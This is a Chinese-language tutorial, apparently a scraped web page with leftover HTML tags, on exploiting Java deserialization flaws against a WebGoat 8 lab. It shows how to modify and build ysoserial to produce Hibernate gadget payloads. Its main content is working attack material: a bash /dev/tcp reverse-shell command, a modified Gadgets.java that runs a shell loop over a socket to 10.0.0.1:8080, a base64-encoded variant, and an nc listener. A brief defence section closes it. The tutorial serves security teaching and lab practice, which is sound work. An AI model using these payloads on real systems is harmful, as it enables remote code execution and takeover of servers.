Java反序列化漏洞利用实战：从发现到获取反向Shell<\/h1>

1. Java反序列化漏洞概述<\/h2>

Java反序列化漏洞是安全社区中已知多年的高危漏洞，最早由Chris Frohoff和Gabriel Lawrence在2015年AppSecCali会议上提出。该漏洞源于Java对象序列化机制：<\/p>

序列化<\/strong>：将内存中的对象转换为二进制或文本格式以便存储或传输<\/li>
反序列化<\/strong>：将序列化数据还原为内存中的对象<\/li>

漏洞本质<\/strong>：当应用程序反序列化不可信数据时，可能导致远程代码执行(RCE)<\/li> <\/ul>
2. 漏洞发现与验证<\/h2>
2.1 工具准备<\/h3>

Burp Suite<\/strong>：用于拦截和分析HTTP请求<\/li>
Java-Deserialization-Scanner插件<\/strong>：

提供扫描功能检测潜在漏洞<\/li>
集成ysoserial生成利用代码<\/li> <\/ul> <\/li> <\/ol>
2.2 扫描过程<\/h3>

拦截目标应用(如WebGoat 8)的序列化数据请求<\/li>
使用插件扫描端点，典型输出示例：
Hibernate 5 (Sleep): Potentially VULNERABLE!!! <\/code><\/pre> <\/li> <\/ol> 3. 漏洞利用准备<\/h2> 3.1 ysoserial工具<\/h3> ysoserial是专门用于生成Java反序列化利用payload的工具，但原始版本对Hibernate 5支持存在问题。<\/p> 3.2 修改ysoserial<\/h3> 添加依赖<\/strong>：在pom.xml中添加javax.el包<\/p> <dependency><\/span> <\/span><\/span> <groupId><\/span>javax.el<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>javax.el-api<\/artifactId><\/span> <\/span><\/span> <version><\/span>3.0.0<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre><\/li> 重新构建<\/strong>：<\/p> mvn clean package -DskipTests -Dhibernate5 <\/span><\/span><\/code><\/pre><\/li> 生成测试payload<\/strong>：<\/p> java -Dhibernate5 -jar target\/ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "touch \/tmp\/test"<\/span> | base64 -w0 <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4. 获取反向Shell<\/h2> 4.1 环境限制分析<\/h3> 在受限环境中，首先枚举可用二进制：<\/p> which php <\/span><\/span>which python <\/span><\/span>which python3 <\/span><\/span>which wget <\/span><\/span>which curl <\/span><\/span>which nc <\/span><\/span>which perl <\/span><\/span>which bash <\/span><\/span><\/code><\/pre>常见结果可能只有Perl和Bash可用。<\/p> 4.2 Shell选择与限制<\/h3> Bash反向Shell<\/strong>：<\/p> bash -i >& \/dev\/tcp\/10.0.0.1\/8080 0>&1<\/span> <\/span><\/span><\/code><\/pre> 问题：java.lang.Runtime.exec()<\/code>不支持重定向或管道操作符<\/li> <\/ul> <\/li> Java实现反向Shell<\/strong>：修改ysoserial的Gadgets.java文件(第116-118行)：<\/p> String cmd =<\/span> "java.lang.Runtime.getRuntime().exec(new String []{\"\/bin\/bash\",\"-c\",\"exec 5<>\/dev\/tcp\/10.0.0.1\/8080;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"}).waitFor();"<\/span>;<\/span> <\/span><\/span>clazz.<\/span>makeClassInitializer<\/span>().<\/span>insertAfter<\/span>(<\/span>cmd);<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.3 替代编码方案<\/h3> 使用在线编码器(如http:\/\/jackson.thuraisamy.me\/runtime-exec-payloads.html)将Bash命令编码为可执行格式：<\/p> 原始命令：<\/p> bash -i >& \/dev\/tcp\/10.0.0.1\/8080 0>&1<\/span> <\/span><\/span><\/code><\/pre>编码后payload：<\/p> bash -c {<\/span>echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}<\/span>|{<\/span>base64,-d}<\/span>|{<\/span>bash,-i}<\/span> <\/span><\/span><\/code><\/pre>5. 完整利用流程<\/h2> 生成反向Shell payload<\/strong>：<\/p> java -Dhibernate5 -jar ysoserial-0.0.6-SNAPSHOT-all.jar Hibernate1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xLzgwODAgMD4mMQ==}|{base64,-d}|{bash,-i}"<\/span> | base64 -w0 <\/span><\/span><\/code><\/pre><\/li> 监听端口<\/strong>：<\/p> nc -lvnp 8080<\/span> <\/span><\/span><\/code><\/pre><\/li> 发送payload<\/strong>：将生成的Base64编码payload发送到目标应用的序列化端点<\/p> <\/li> <\/ol> 6. 防御建议<\/h2> 输入验证<\/strong>：不要反序列化不可信数据<\/li> 使用安全替代方案<\/strong>： JSON、XML等安全数据格式<\/li> 使用白名单验证反序列化类<\/li> <\/ul> <\/li> 更新依赖<\/strong>：及时更新框架和库<\/li> 安全配置<\/strong>：使用ObjectInputFilter<\/code>限制反序列化类<\/li> 考虑使用SerialKiller<\/code>等防护工具<\/li> <\/ul> <\/li> <\/ol> 7. 参考资料<\/h2> Marshalling Pickles演讲<\/a><\/li> Java反序列化漏洞详解<\/a><\/li> Spring RCE漏洞分析<\/a><\/li> 反向Shell备忘录<\/a><\/li> <\/ol>